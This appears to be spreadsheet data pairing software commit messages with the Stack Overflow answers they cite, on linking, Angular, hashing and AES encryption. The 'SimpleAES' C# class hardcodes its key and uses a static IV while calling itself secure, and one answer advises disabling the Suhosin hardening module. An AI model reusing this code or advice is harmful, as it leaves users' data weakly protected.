&lt;pre&gt;&lt;code&gt;SELECT DISTINCT    
G.CERTIFICATION_NAME
FROM     
GRC_ACN_CERTIFICATION_VIEW G
WHERE 
1=1 AND
(
G.CERTIFICATION_NAME IN (:cert_name_p)
OR LEAST(:cert_name_p) IS NULL
)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C812</t>
  </si>
  <si>
    <t>feat(angular): update angular from 8 to 9
* angular.json: angular 9 use Ivy to compile the app and it needs AOT compilation to make it faster.
* app.error-handler.ts: use setTimeout to workaround the cyclic dependencies problem. [link](https://stackoverflow.com/questions/41585863/injecting-services-in-custom-errorhandler-causes-cannot-instantiate-cyclic-depe)
* IPhoto.ts: export the interface.
* TypeScript: update to 3.8.2.
* tsconfig.app.json and tsconfig.server.json: add files and includes property.</t>
  </si>
  <si>
    <t>You can use this workaround to break up cyclic dependencies with DI
@Injectable()
export class MyErrorHandler implements ErrorHandler {
  private _appLog: AppLog;
  constructor (injector:Injector) {
    setTimeout(() =&gt; this._appLog = injector.get(AppLog));
  }
  ...
}
Angulars DI itself just doesn't support cyclic dependencies.</t>
  </si>
  <si>
    <t xml:space="preserve">I recently had to program C++ under Windows for an University project, and I'm pretty confused about static and dynamic libraries system, what the compiler needs, what the linker needs, how to build a library ... is there any good document about this out there? I'm pretty confused about the *nix library system as well (so, dylibs, the ar tool, how to compile them ...), can you point a review document about the current library techniques on the various architectures? 
Note: due to my poor knowledge this message could contain wrong concepts, feel free to edit it.
Thank you
Feel free to add more reference, I will add them to the summary.
References
Since most of you posted *nix or Windows specific references I will summarize here the best ones, I will mark as accepted answer the Wikipedia one, because is a good start point (and has references inside too) to get introduced to this stuff.
[external-link] (Unix)
[external-link] (Windows) 
[external-link] (Windows)
[external-link] (Unix)
[external-link] (Windows)
</t>
  </si>
  <si>
    <t>C813</t>
  </si>
  <si>
    <t>Fix compilation of mmsolverlibs on Linux/GCC.
On Linux the order of the libraries given to the (GCC) linker matters a
lot.
This issue comes from the fact that mmsolverlibs_rust and mmsolverlibs
(C++) both use functions from each other and so there is a cyclic
dependency between them.
The transitive dependency that mmsolverlibs has on mmsolverlibs_rust
does not allow the rust dependency to be linked on Linux - on Windows
with MSVC, it's fine.
This page contained the critical information to help understand the
issue:
https://stackoverflow.com/questions/45135/why-does-the-order-in-which-libraries-are-linked-sometimes-cause-errors-in-gcc
Due to this change the test binaries for mmsolverlib has been re-enabled
(because they now work correctly).</t>
  </si>
  <si>
    <t>(See the history on this answer to get the more elaborate text, but I now think it's easier for the reader to see real command lines).
Common files shared by all below commands
// a depends on b, b depends on d
$ cat a.cpp
extern int a;
int main() {
  return a;
}
$ cat b.cpp
extern int b;
int a = b;
$ cat d.cpp
int b;
Linking to static libraries
$ g++ -c b.cpp -o b.o
$ ar cr libb.a b.o
$ g++ -c d.cpp -o d.o
$ ar cr libd.a d.o
$ g++ -L. -ld -lb a.cpp # wrong order
$ g++ -L. -lb -ld a.cpp # wrong order
$ g++ a.cpp -L. -ld -lb # wrong order
$ g++ a.cpp -L. -lb -ld # right order
The linker searches from left to right, and notes unresolved symbols as it goes. If a library resolves the symbol, it takes the object files of that library to resolve the symbol (b.o out of libb.a in this case).
Dependencies of static libraries against each other work the same - the library that needs symbols must be first, then the library that resolves the symbol.
If a static library depends on another library, but the other library again depends on the former library, there is a cycle. You can resolve this by enclosing the cyclically dependent libraries by
-(
and
-)
, such as
-( -la -lb -)
(you may need to escape the parens, such as
-\(
and
-\)
). The linker then searches those enclosed lib multiple times to ensure cycling dependencies are resolved. Alternatively, you can specify the libraries multiple times, so each is before one another:
-la -lb -la
.
Linking to dynamic libraries
$ export LD_LIBRARY_PATH=. # not needed if libs go to /usr/lib etc
$ g++ -fpic -shared d.cpp -o libd.so
$ g++ -fpic -shared b.cpp -L. -ld -o libb.so # specifies its dependency!
$ g++ -L. -lb a.cpp # wrong order (works on some distributions)
$ g++ -Wl,--as-needed -L. -lb a.cpp # wrong order
$ g++ -Wl,--as-needed a.cpp -L. -lb # right order
It's the same here - the libraries must follow the object files of the program. The difference here compared with static libraries is that you need not care about the dependencies of the libraries against each other, because
dynamic libraries sort out their dependencies themselves
.
Some recent distributions apparently default to using the
--as-needed
linker flag, which enforces that the program's object files come before the dynamic libraries. If that flag is passed, the linker will not link to libraries that are not actually needed by the executable (and it detects this from left to right). My recent archlinux distribution doesn't use this flag by default, so it didn't give an error for not following the correct order.
It is not correct to omit the dependency of
b.so
against
d.so
when creating the former. You will be required to specify the library when linking
a
then, but
a
doesn't really need the integer
b
itself, so it should not be made to care about
b
's own dependencies.
Here is an example of the implications if you miss specifying the dependencies for
libb.so
$ export LD_LIBRARY_PATH=. # not needed if libs go to /usr/lib etc
$ g++ -fpic -shared d.cpp -o libd.so
$ g++ -fpic -shared b.cpp -o libb.so # wrong (but links)
$ g++ -L. -lb a.cpp # wrong, as above
$ g++ -Wl,--as-needed -L. -lb a.cpp # wrong, as above
$ g++ a.cpp -L. -lb # wrong, missing libd.so
$ g++ a.cpp -L. -ld -lb # wrong order (works on some distributions)
$ g++ -Wl,--as-needed a.cpp -L. -ld -lb # wrong order (like static libs)
$ g++ -Wl,--as-needed a.cpp -L. -lb -ld # "right"
If you now look into what dependencies the binary has, you note the binary itself depends also on
libd
, not just
libb
as it should. The binary will need to be relinked if
libb
later depends on another library, if you do it this way. And if someone else loads
libb
using
dlopen
at runtime (think of loading plugins dynamically), the call will fail as well. So the
"right"
really should be a
wrong
as well.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I do not think the CupertinoApp or Container has the min-width restriction but I couldn't find a way to get rid of it. Any help would be appreciated.&lt;/p&gt;
&lt;pre class="lang-dart prettyprint-override"&gt;&lt;code&gt;void main() {
  runApp(const MyApp());
}
class MyApp extends StatelessWidget {
  const MyApp({super.key});
  @override
  Widget build(BuildContext context) {
    return CupertinoApp(
        home:  Container(color: CupertinoColors.systemRed,),
    );
  }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C814</t>
  </si>
  <si>
    <t>Changed cookie encryption to rijndael
Since suhosin disabled srand() by default and CakePHP's Security::cipher()
function uses srand(), the encryption of cookies does not work properly out of
the box.
The cookie encryption is changed to rijndael and mcrypt extension must be
installed.
See also
- http://stackoverflow.com/questions/6087463/cakephp-securitycipher-is-not-working-specifically-on-server</t>
  </si>
  <si>
    <t>Security::cipher() is using srand() function which is disabled by suhosin module which comes as default for many Apache, PHP servers.
Disable suhosin and Security::cipher() will work fine.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm trying to modify a C# WinForms application that uses multiple forms. At startup, a login window will be shown. If the user logs in with a correct user name and password combo a form with three different tabs will be shown as a sort of administrators view. If no password or user name is supplied, a much simplified GUI will be shown. It will basically consist of two buttons that in turn shows these two forms depending on which button is pressed:
Button 1: Give the user access to a form consisting of a number of textboxes where the user can input information that will be saved to a database. Once the DB-operation has been executed successfully, the first form with the two buttons will be displayed again.
Button 2: A form is shown where the user can input a code that will be written to DB. Once the DB operation is concluded, the user will automatically be taken back to the original form with the two buttons.
Both forms will also have a back button to take the user back to the first form. I have a lot of logic in place, but I am unsure of how to best handle all the forms involved. Where should I instantiate the first (login) form? Once the login validation is done there are two possible ways to go. Either show the tabbed admin form (if user name and password is correct) or the simplified user form with two large buttons. It should also be possible to logout from the admin form so that the simplified GUI is shown instead.
I hope I am making sense here. I just need a good way to handle all the forms and navigation between them. Currently, there aren't really any need for transporting data between them, but it might be an issue in the future so a solution that takes this into account would be excellent.
I'm thinking that what is needed is really a class that handles the displaying and disposing of the forms right from the start, but I'm not quite sure where I should put the instantiation of this handling class. 
</t>
  </si>
  <si>
    <t>C815</t>
  </si>
  <si>
    <t>Added a simple AES encryption class
New IV generated for each encryption, and concatenated with encrypted string
Uses http://stackoverflow.com/questions/165808/simple-two-way-encryption-for-c-sharp as an inspiration</t>
  </si>
  <si>
    <t>Other answers here work fine, but AES is a more secure and up-to-date encryption algorithm.  This is a class that I obtained a few years ago to perform AES encryption that I have modified over time to be more friendly for web applications (e,g. I've built Encrypt/Decrypt methods that work with URL-friendly string).  It also has the methods that work with byte arrays.
NOTE: you should use different values in the Key (32 bytes) and Vector (16 bytes) arrays!  You wouldn't want someone to figure out your keys by just assuming that you used this code as-is!  All you have to do is change some of the numbers (must be &lt;= 255) in the Key and Vector arrays (I left one invalid value in the Vector array to make sure you do this...).  You can use
https://www.random.org/bytes/
to generate a new set easily:
generate
Key
generate
Vector
Using it is easy: just instantiate the class and then call (usually) EncryptToString(string StringToEncrypt) and DecryptString(string StringToDecrypt) as methods.  It couldn't be any easier (or more secure) once you have this class in place.
using System;
using System.Data;
using System.Security.Cryptography;
using System.IO;
public class SimpleAES
{
    // Change these keys
    private byte[] Key = __Replace_Me__({ 123, 217, 19, 11, 24, 26, 85, 45, 114, 184, 27, 162, 37, 112, 222, 209, 241, 24, 175, 144, 173, 53, 196, 29, 24, 26, 17, 218, 131, 236, 53, 209 });
    // a hardcoded IV should not be used for production AES-CBC code
    // IVs should be unpredictable per ciphertext
    private byte[] Vector = __Replace_Me__({ 146, 64, 191, 111, 23, 3, 113, 119, 231, 121, 2521, 112, 79, 32, 114, 156 });
    private ICryptoTransform EncryptorTransform, DecryptorTransform;
    private System.Text.UTF8Encoding UTFEncoder;
    public SimpleAES()
    {
        //This is our encryption method
        RijndaelManaged rm = new RijndaelManaged();
        //Create an encryptor and a decryptor using our encryption method, key, and vector.
        EncryptorTransform = rm.CreateEncryptor(this.Key, this.Vector);
        DecryptorTransform = rm.CreateDecryptor(this.Key, this.Vector);
        //Used to translate bytes to text and vice versa
        UTFEncoder = new System.Text.UTF8Encoding();
    }
    /// -------------- Two Utility Methods (not used but may be useful) -----------
    /// Generates an encryption key.
    static public byte[] GenerateEncryptionKey()
    {
        //Generate a Key.
        RijndaelManaged rm = new RijndaelManaged();
        rm.GenerateKey();
        return rm.Key;
    }
    /// Generates a unique encryption vector
    static public byte[] GenerateEncryptionVector()
    {
        //Generate a Vector
        RijndaelManaged rm = new RijndaelManaged();
        rm.GenerateIV();
        return rm.IV;
    }
    /// ----------- The commonly used methods ------------------------------    
    /// Encrypt some text and return a string suitable for passing in a URL.
    public string EncryptToString(string TextValue)
    {
        return ByteArrToString(Encrypt(TextValue));
    }
    /// Encrypt some text and return an encrypted byte array.
    public byte[] Encrypt(string TextValue)
    {
        //Translates our text value into a byte array.
        Byte[] bytes = UTFEncoder.GetBytes(TextValue);
        //Used to stream the data in and out of the CryptoStream.
        MemoryStream memoryStream = new MemoryStream();
        /*
         * We will have to write the unencrypted bytes to the stream,
         * then read the encrypted result back from the stream.
         */
        #region Write the decrypted value to the encryption stream
        CryptoStream cs = new CryptoStream(memoryStream, EncryptorTransform, CryptoStreamMode.Write);
        cs.Write(bytes, 0, bytes.Length);
        cs.FlushFinalBlock();
        #endregion
        #region Read encrypted value back out of the stream
        memoryStream.Position = 0;
        byte[] encrypted = new byte[memoryStream.Length];
        memoryStream.Read(encrypted, 0, encrypted.Length);
        #endregion
        //Clean up.
        cs.Close();
        memoryStream.Close();
        return encrypted;
    }
    /// The other side: Decryption methods
    public string DecryptString(string EncryptedString)
    {
        return Decrypt(StrToByteArray(EncryptedString));
    }
    /// Decryption when working with byte arrays.    
    public string Decrypt(byte[] EncryptedValue)
    {
        #region Write the encrypted value to the decryption stream
        MemoryStream encryptedStream = new MemoryStream();
        CryptoStream decryptStream = new CryptoStream(encryptedStream, DecryptorTransform, CryptoStreamMode.Write);
        decryptStream.Write(EncryptedValue, 0, EncryptedValue.Length);
        decryptStream.FlushFinalBlock();
        #endregion
        #region Read the decrypted value from the stream.
        encryptedStream.Position = 0;
        Byte[] decryptedBytes = new Byte[encryptedStream.Length];
        encryptedStream.Read(decryptedBytes, 0, decryptedBytes.Length);
        encryptedStream.Close();
        #endregion
        return UTFEncoder.GetString(decryptedBytes);
    }
    /// Convert a string to a byte array.  NOTE: Normally we'd create a Byte Array from a string using an ASCII encoding (like so).
    //      System.Text.ASCIIEncoding encoding = new System.Text.ASCIIEncoding();
    //      return encoding.GetBytes(str);
    // However, this results in character values that cannot be passed in a URL.  So, instead, I just
    // lay out all of the byte values in a long string of numbers (three per - must pad numbers less than 100).
    public byte[] StrToByteArray(string str)
    {
        if (str.Length == 0)
            throw new Exception("Invalid string value in StrToByteArray");
        byte val;
        byte[] byteArr = new byte[str.Length / 3];
        int i = 0;
        int j = 0;
        do
        {
            val = byte.Parse(str.Substring(i, 3));
            byteArr[j++] = val;
            i += 3;
        }
        while (i &lt; str.Length);
        return byteArr;
    }
    // Same comment as above.  Normally the conversion would use an ASCII encoding in the other direction:
    //      System.Text.ASCIIEncoding enc = new System.Text.ASCIIEncoding();
    //      return enc.GetString(byteArr);    
    public string ByteArrToString(byte[] byteArr)
    {
        byte val;
        string tempStr = "";
        for (int i = 0; i &lt;= byteArr.GetUpperBound(0); i++)
        {
            val = byteArr[i];
            if (val &lt; (byte)10)
                tempStr += "00" + val.ToString();
            else if (val &lt; (byte)100)
                tempStr += "0" + val.ToString();
            else
                tempStr += val.ToString();
        }
        return tempStr;
    }
}</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Iâ€™m trying to enable chitchat in my Rasa Pro CALM bot. My code is exactly as in the Rasa CALM docs: &lt;a href="https://rasa.com/docs/rasa-pro/building-assistants/enable-chitchat/" rel="nofollow noreferrer"&gt;Chitchat and Small Talk&lt;/a&gt; , but after any chitchat message from the user, I get the default â€œcannot handleâ€ message as a response.&lt;/p&gt;
&lt;p&gt;I have&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;fully functioning Rasa CALM v3.10.7 installed locally where everything else works well&lt;/li&gt;
&lt;li&gt;Intentess policy set up in config.yml&lt;/li&gt;
&lt;li&gt;rephrase turned on in endpoints.yml&lt;/li&gt;
&lt;li&gt;working OpenAI key in the env&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;In the logs I see the Chitchat() command is correctly predicted, but a bit later â€œcannot_handleâ€ pattern is triggered with reason â€œcannot_handle_chitchatâ€. Here is what I think is the relevant part of the logs:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2025-02-13 14:10:00 DEBUG    rasa.shared.providers._ssl_verification_utils  - [debug    ] ensure_ssl_certificates_for_litellm_non_openai_based_clients ssl_certificate=None ssl_verify=None
2025-02-13 14:10:00 DEBUG    rasa.shared.providers._ssl_verification_utils  - [debug    ] ensure_ssl_certificates_for_litellm_openai_based_clients ssl_certificate=None ssl_verify=None
2025-02-13 14:10:00 DEBUG    rasa.shared.providers.llm._base_litellm_client  - [debug    ] base_litellm_client.formatted_response formatted_response={'id': 'chatcmpl-B0SktHKKj9ujsDzIK1AXhZg0nTzLA', 'choices': ['ChitChat()'], 'created': 1739450235, 'model': 'gpt-4-0613', 'usage': {'prompt_tokens': 730, 'completion_tokens': 5, 'total_tokens': 735}, 'additional_info': None}
2025-02-13 14:10:00 DEBUG    rasa.utils.log_utils  - [debug    ] llm_command_generator.predict_commands.actions_generated action_list=ChitChat()
C:\Users\PetrG\AppData\Local\miniconda3\envs\Chatbot-assistant\lib\site-packages\pydantic\main.py:314: UserWarning: Pydantic serializer warnings:
  Expected `CompletionTokensDetails` but got `dict` - serialized value may not be as expected
  return self.__pydantic_serializer__.to_python(
2025-02-13 14:10:00 DEBUG    rasa.utils.log_utils  - [debug    ] llm_command_generator.predict_commands.finished commands=[ChitChatAnswerCommand()]
2025-02-13 14:10:00 DEBUG    rasa.engine.graph  - [debug    ] graph.node.running_component   clazz=RegexMessageHandler fn=process node_name=run_RegexMessageHandler
2025-02-13 14:10:00 DEBUG    rasa.core.processor  - [debug    ] processor.message.parse        parse_data_entities=[] parse_data_intent={'name': None, 'confidence': 0.0} parse_data_text=how are you?
2025-02-13 14:10:00 DEBUG    rasa.core.processor  - Logged UserUtterance - tracker now has 4 events.
2025-02-13 14:10:00 DEBUG    rasa.engine.runner.dask  - Running graph with inputs: {'__tracker__': DialogueStateTracker(sender_id: a4870e22aff94850840a49e6947c7018)}, targets: ['command_processor'] and ExecutionContext(model_id='f4e31ef37a464f6b83d396a9ec864be2', should_add_diagnostic_data=False, is_finetuning=False, node_name=None).
2025-02-13 14:10:00 DEBUG    rasa.engine.graph  - [debug    ] graph.node.running_component   clazz=FlowsProvider fn=provide_inference node_name=flows_provider
2025-02-13 14:10:00 DEBUG    rasa.engine.graph  - [debug    ] graph.node.running_component   clazz=StoryGraphProvider fn=provide_inference node_name=story_graph_provider
2025-02-13 14:10:00 DEBUG    rasa.engine.graph  - [debug    ] graph.node.running_component   clazz=CommandProcessorComponent fn=execute_commands node_name=command_processor
2025-02-13 14:10:00 WARNING  rasa.dialogue_understanding.processor.command_processor  - [warning  ] command_processor.clean_up_chitchat_command.replace_chitchat_answer_with_cannot_handle command=CannotHandleCommand(reason='cannot_handle_chitchat') defined_intentless_policy_in_config=True pattern_chitchat_uses_action_trigger_chitchat=True
2025-02-13 14:10:00 DEBUG    rasa.dialogue_understanding.processor.command_processor  - [debug    ] command_processor.clean_up_commands.final_commands command=[CannotHandleCommand(reason='cannot_handle_chitchat')]
2025-02-13 14:10:00 DEBUG    rasa.engine.runner.dask  - Running graph with inputs: {'__tracker__': DialogueStateTracker(sender_id: a4870e22aff94850840a49e6947c7018), '__endpoints__': &amp;lt;rasa.core.utils.AvailableEndpoints object at 0x000002097B10CE50&amp;gt;}, targets: ['select_prediction'] and ExecutionContext(model_id='f4e31ef37a464f6b83d396a9ec864be2', should_add_diagnostic_data=False, is_finetuning=False, node_name=None).
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;According to info in the docs - &lt;a href="https://rasa.com/docs/rasa-pro/concepts/conversation-repair/#9-cannot-handle" rel="nofollow noreferrer"&gt;Conversation Repair&lt;/a&gt; :&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The pattern pattern_cannot_handle has the context attribute reason.
reason is set to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;cannot_handle_chitchat, when pattern_chitchat attempts to invoke action_trigger_chitchat without an IntentlessPolicy defined.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;But I have IntentlessPolicy in my config.yml and the logs from rasa train suggest it is correctly trained:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;2025-02-13 14:54:06 INFO     rasa.engine.training.hooks  - Starting to train component 'IntentlessPolicy'.
2025-02-13 14:54:07 INFO     rasa.core.policies.intentless_policy  - [info     ] intentless_policy.training.completed
2025-02-13 14:54:08 INFO     rasa.engine.training.hooks  - Finished training component 'IntentlessPolicy'.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;No idea whatâ€™s wrong and how to make it workâ€¦&lt;/p&gt;
&lt;p&gt;Thanks much for any help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C816</t>
  </si>
  <si>
    <t>Gotta use the rijndael encryption. More info about the problem wit
h cipher encryption: http://stackoverflow.com/questions/3050253/cakephp-1-3-0-cookie-value-not-decrypting
Whitespaces in UsersController fixed.</t>
  </si>
  <si>
    <t>If you have the Suhosin security patch installed, for some reason the decryption doesn't work at all.  Referral to the issue and a potential fix:
http://groups.google.com/group/cake-php/browse_thread/thread/7e6cda2e03a7c54/b685c58394d86f50?lnk=gst&amp;q=decrypt+cookie#b685c58394d86f50</t>
  </si>
  <si>
    <t xml:space="preserve">I have been asked to give a metric as to the size of a corporate application. The application in question is a web based application and I am not sure how to quantify its size. Obvious but not useful metrics would be lines of code, number of files etc. What are some suggested means of determining the size of an application that will provide real meaning?
Notes on application:
ASP.NET Web Forms Based C# App
Tiered architecture
All database interaction through stored procedures
</t>
  </si>
  <si>
    <t>C817</t>
  </si>
  <si>
    <t>EncryptPassword to HashPassword
Encryption is a two-way system whereas Hashing is one.
EncryptPassword create an hash of the password
EncryptPassword create an hash of the password and therefore it has to
be renamed.
ref.
https://stackoverflow.com/questions/4948322/fundamental-difference-between-hashing-and-encryption-algorithms</t>
  </si>
  <si>
    <t>Well, you could look it up in
Wikipedia
...  But since you want an explanation, I'll do my best here:
Hash Functions
They provide a mapping between an arbitrary length input, and a (usually) fixed length (or smaller length) output.  It can be anything from a simple crc32, to a full blown cryptographic hash function such as MD5 or SHA1/2/256/512.  The point is that there's a one-way mapping going on.  It's always a many:1 mapping (meaning there will always be collisions) since every function produces a smaller output than it's capable of inputting (If you feed every possible 1mb file into MD5, you'll get a ton of collisions).
The reason they are hard (or impossible in practicality) to reverse is because of how they work internally.  Most cryptographic hash functions iterate over the input set many times to produce the output.  So if we look at each fixed length chunk of input (which is algorithm dependent), the hash function will call that the current state.  It will then iterate over the state and change it to a new one and use that as feedback into itself (MD5 does this 64 times for each 512bit chunk of data).  It then somehow combines the resultant states from all these iterations back together to form the resultant hash.
Now, if you wanted to decode the hash, you'd first need to figure out how to split the given hash into its iterated states (1 possibility for inputs smaller than the size of a chunk of data, many for larger inputs).  Then you'd need to reverse the iteration for each state.  Now, to explain why this is VERY hard, imagine trying to deduce
a
and
b
from the following formula:
10 = a + b
.  There are 10 positive combinations of
a
and
b
that can work.  Now loop over that a bunch of times:
tmp = a + b; a = b; b = tmp
. For 64 iterations, you'd have over 10^64 possibilities to try.  And that's just a simple addition where some state is preserved from iteration to iteration.  Real hash functions do a lot more than 1 operation (MD5 does about 15 operations on 4 state variables). And since the next iteration depends on the state of the previous and the previous is destroyed in creating the current state, it's all but impossible to determine the input state that led to a given output state (for each iteration no less).  Combine that, with the large number of possibilities involved, and decoding even an MD5 will take a near infinite (but not infinite) amount of resources. So many resources that it's actually significantly cheaper to brute-force the hash if you have an idea of the size of the input (for smaller inputs) than it is to even try to decode the hash.
Encryption Functions
They provide a 1:1 mapping between an arbitrary length input and output.  And they are always reversible.  The important thing to note is that it's reversible using some method.  And it's always 1:1 for a given key.  Now, there are multiple input:key pairs that might generate the same output (in fact there usually are, depending on the encryption function).  Good encrypted data is indistinguishable from random noise.  This is different from a good hash output which is always of a consistent format.
Use Cases
Use a hash function when you want to compare a value but can't store the plain representation (for any number of reasons).  Passwords should fit this use-case very well since you don't want to store them plain-text for security reasons (and shouldn't).  But what if you wanted to check a filesystem for pirated music files?  It would be impractical to store 3 mb per music file.  So instead, take the hash of the file, and store that (md5 would store 16 bytes instead of 3mb).  That way, you just hash each file and compare to the stored database of hashes (This doesn't work as well in practice because of re-encoding, changing file headers, etc, but it's an example use-case).
Use a hash function when you're checking validity of input data.  That's what they are designed for.  If you have 2 pieces of input, and want to check to see if they are the same, run both through a hash function.  The probability of a collision is astronomically low for small input sizes (assuming a good hash function).  That's why it's recommended for passwords.  For passwords up to 32 characters, md5 has 4 times the output space.  SHA1 has 6 times the output space (approximately).  SHA512 has about 16 times the output space.  You don't really care what the password
was
, you care if it's the same as the one that was stored.  That's why you should use hashes for passwords.
Use encryption whenever you need to get the input data back out.  Notice the word
need
.  If you're storing credit card numbers, you need to get them back out at some point, but don't want to store them plain text.  So instead, store the encrypted version and keep the key as safe as possible.
Hash functions are also great for signing data.  For example, if you're using HMAC, you sign a piece of data by taking a hash of the data concatenated with a known but not transmitted value (a secret value).  So, you send the plain-text and the HMAC hash.  Then, the receiver simply hashes the submitted data with the known value and checks to see if it matches the transmitted HMAC.  If it's the same, you know it wasn't tampered with by a party without the secret value.  This is commonly used in secure cookie systems by HTTP frameworks, as well as in message transmission of data over HTTP where you want some assurance of integrity in the data.
A note on hashes for passwords:
A key feature of cryptographic hash functions is that they should be very fast to create, and
very
difficult/slow to reverse (so much so that it's practically impossible).  This poses a problem with passwords.  If you store
sha512(password)
, you're not doing a thing to guard against rainbow tables or brute force attacks. Remember, the hash function was designed for speed.  So it's trivial for an attacker to just run a dictionary through the hash function and test each result.
Adding a salt helps matters since it adds a bit of unknown data to the hash.  So instead of finding anything that matches
md5(foo)
, they need to find something that when added to the known salt produces
md5(foo.salt)
(which is very much harder to do).  But it still doesn't solve the speed problem since if they know the salt it's just a matter of running the dictionary through.
So, there are ways of dealing with this.  One popular method is called
key strengthening
(or key stretching).  Basically, you iterate over a hash many times (thousands usually).  This does two things.  First, it slows down the runtime of the hashing algorithm significantly.  Second, if implemented right (passing the input and salt back in on each iteration) actually increases the entropy (available space) for the output, reducing the chances of collisions.  A trivial implementation is:
var hash = password + salt;
for (var i = 0; i &lt; 5000; i++) {
    hash = sha512(hash + password + salt);
}
There are other, more standard implementations such as
PBKDF2
,
BCrypt
.  But this technique is used by quite a few security related systems (such as PGP, WPA, Apache and OpenSSL).
The bottom line,
hash(password)
is not good enough.
hash(password + salt)
is better, but still not good enough...  Use a stretched hash mechanism to produce your password hashes...
Another note on trivial stretching
Do not under any circumstances feed the output of one hash directly back into the hash function
:
hash = sha512(password + salt); 
for (i = 0; i &lt; 1000; i++) {
    hash = sha512(hash); // &lt;-- Do NOT do this!
}
The reason for this has to do with collisions.  Remember that all hash functions have collisions because the possible output space (the number of possible outputs) is smaller than then input space.  To see why, let's look at what happens.  To preface this, let's make the assumption that there's a 0.001% chance of collision from
sha1()
(it's
much
lower in reality, but for demonstration purposes).
hash1 = sha1(password + salt);
Now,
hash1
has a probability of collision of 0.001%.  But when we do the next
hash2 = sha1(hash1);
,
all collisions of
hash1
automatically become collisions of
hash2
.  So now, we have hash1's rate at 0.001%, and the 2nd
sha1()
call adds to that.  So now,
hash2
has a probability of collision of 0.002%.  That's twice as many chances!  Each iteration will add another
0.001%
chance of collision to the result.  So, with 1000 iterations, the chance of collision jumped from a trivial 0.001% to 1%.  Now, the degradation is linear, and the real probabilities are
far
smaller, but the effect is the same (an estimation of the chance of a single collision with
md5
is about 1/(2
128
) or 1/(3x10
38
).  While that seems small, thanks to
the birthday attack
it's not really as small as it seems).
Instead, by re-appending the salt and password each time, you're re-introducing data back into the hash function.  So any collisions of any particular round are no longer collisions of the next round.  So:
hash = sha512(password + salt);
for (i = 0; i &lt; 1000; i++) {
    hash = sha512(hash + password + salt);
}
Has the same chance of collision as the native
sha512
function.  Which is what you want.  Use that instead.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a C++ application that requires some basic randomness in various places throughout the codebase. What is the best practice for obtaining randomness with the C++11 PRNG library?&lt;/p&gt;
&lt;p&gt;Specifically, I'm looking for something similar to Java's &lt;code&gt;ThreadLocalRandom&lt;/code&gt; that will suffice as a URBG (&lt;em&gt;UniformRandomBitGenerator&lt;/em&gt;) that I can use on-demand when I don't need anything fancy. I thought the &lt;code&gt;default_random_engine&lt;/code&gt; looked promising, but this doesn't solve the whole issue because I don't want to deal with seeding one of these every time I need randomness.&lt;/p&gt;
&lt;p&gt;My current solution is to write two source files -- two lines each -- to declare/define a shared URBG that I can use anywhere in my application:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// my_random.hpp
#include &amp;lt;random&amp;gt;
extern std::default_random_engine my_urbg;
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;// my_random.cpp
#include &amp;lt;random&amp;gt;
std::default_random_engine my_urbg(std::random_device()());
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;so I can use it like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;// some_application_source.cpp
#include &amp;quot;my_random.hpp&amp;quot;
...
int my_number = std::uniform_int_distribution(0,99)(my_urbg);
...
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I can't be the only one who wants this, so I figured I'd ask if there's a better way that I'm just missing. Perhaps something in the C++ standard library that achieves this...? Perhaps something thread-safe...? Perhaps something more proper than two tiny files...?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C818</t>
  </si>
  <si>
    <t>Fixed xor encryption and changed to printstream
XOR was redone much like this:
http://stackoverflow.com/questions/13641563/xor-cipher-in-java-php-different-results</t>
  </si>
  <si>
    <t>In your PHP encryption method, you have the following code:
for ($i = 0; $i &lt; $ml; $i++){
  $newmsg = $newmsg . ($msg[$i] ^ $key[$i % $kl]);
}
However,
$msg
is not defined anywhere. That should be
$message
.</t>
  </si>
  <si>
    <t xml:space="preserve">I'm building an application that will distribute its processing over a farm. In my basic design I have two services: 
A "controller" which watches for new work, queues it up, and manages the results.
A "worker" which binds to a particular controller. The worker will check out work from its controller, and push the results back.
In the breif look I've had at WCF, it seems to imply a MEST style message-passing SOA. This mechanism doesn't seem to jive with the types of communication &amp; coordination I'll be doing.
Am I mixed up on what WCF is? Is there still a place in this world for .NET remoting? Or am I thinking about the problem in a jurassic, pre-WCF mindset.
Edit:
Left out some detail. The rub is that I need to timebox the work. If a workitem is checked out for too long, I should be able to error the whole thing. The examples I've seen all seem to take a "send and forget" stance towards the outgoing messages. I need a deterministic result or error in a reasonable timeframe. Hope that clarifies.
</t>
  </si>
  <si>
    <t>C819</t>
  </si>
  <si>
    <t>Merged PR 10300: Add database api token encryption at rest
Enables the RedCap API tokens provided by the user to be encrypted at rest, rather than stored as plain text as before.
Uses [EntityFrameworkCore.DataEncryption](https://github.com/Eastrall/EntityFrameworkCore.DataEncryption) to do so, which is using EF Core value convertors to encrypt the data. This is so the Data project handles the encryption/decryption directly.
However, the external package does not natively support dynamic IV's, so we use a custom AES provider to do so: `DynamicIvAesProvider`.
(see reading for why dynamic IV is important)
We also use a padding mode of `ISO10126`, rather than `PKCS7`, following: https://learn.microsoft.com/en-us/dotnet/standard/security/vulnerabilities-cbc-mode#guidance
Supporting reading on encryption:
- https://stackoverflow.com/questions/1220751/how-to-choose-an-aes-encryption-mode-cbc-ecb-ctr-ocb-cfb/42658861#42658861</t>
  </si>
  <si>
    <t>ECB should not be used if encrypting more than one block of data with the same key.
CBC, OFB and CFB are similar, however OFB/CFB is better because you only need encryption and not decryption, which can save code space.
